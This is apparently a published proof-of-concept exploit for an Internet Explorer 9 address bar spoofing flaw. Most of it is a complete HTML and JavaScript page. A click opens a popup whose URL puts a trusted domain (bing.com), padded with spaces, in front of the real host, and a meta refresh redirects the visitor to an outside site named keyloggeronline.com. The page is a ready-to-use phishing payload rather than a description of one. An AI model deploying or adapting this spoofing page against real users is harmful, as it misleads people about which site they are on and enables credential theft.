Internet Explorer 9 address bar spoofing proof of concept.
1cc3a544672daefbbe3464c6071e3f5f435bef8cbd33785491b6acfef42c8082
IE9 Address Bar Spoof: For a quick demo, please visit
https://keyloggeronline.com/misc/temp/about.htm
Thanks.
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="REFRESH" content="10;url=https://www.keyloggeronline.com/index.php">
<title>Spoof</title>
<script>
function myOpen() {
var mywin=open('about:blank',"mywindow",'location=1,scrollbars=0,width=300,height=290');
mywin.location.href="https://www.keyloggeronline.com/misc/temp/a.php?https://www.bing.com/"+Array(5).join(' ')+' ';
self.blur();
}
</script>
</head>
<body onclick="myOpen();">
Click anywhere on this page!
</body>
</html>